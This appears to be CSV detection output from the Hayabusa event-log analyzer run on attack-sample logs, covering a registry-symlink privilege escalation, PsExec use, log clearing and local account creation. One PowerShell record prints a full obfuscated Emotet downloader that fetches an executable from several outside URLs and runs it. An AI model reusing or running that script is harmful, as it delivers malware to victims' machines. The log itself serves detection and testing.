C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.704 
+09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 
2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 
747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: 
C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File 
Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,info,,PwSh Scriptblock Log,"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::""SecURi`T`ypRO`T`oCOL"" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 
neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').""S`Plit""([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.""d`OWN`load`FIlE""($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).""le`NgTH"" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx 2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx 2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 
075C05C2-EE8D-5F45-8401-000000000400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx 2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx 2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool 
Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 
00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): 
Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added 
or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:22.974 
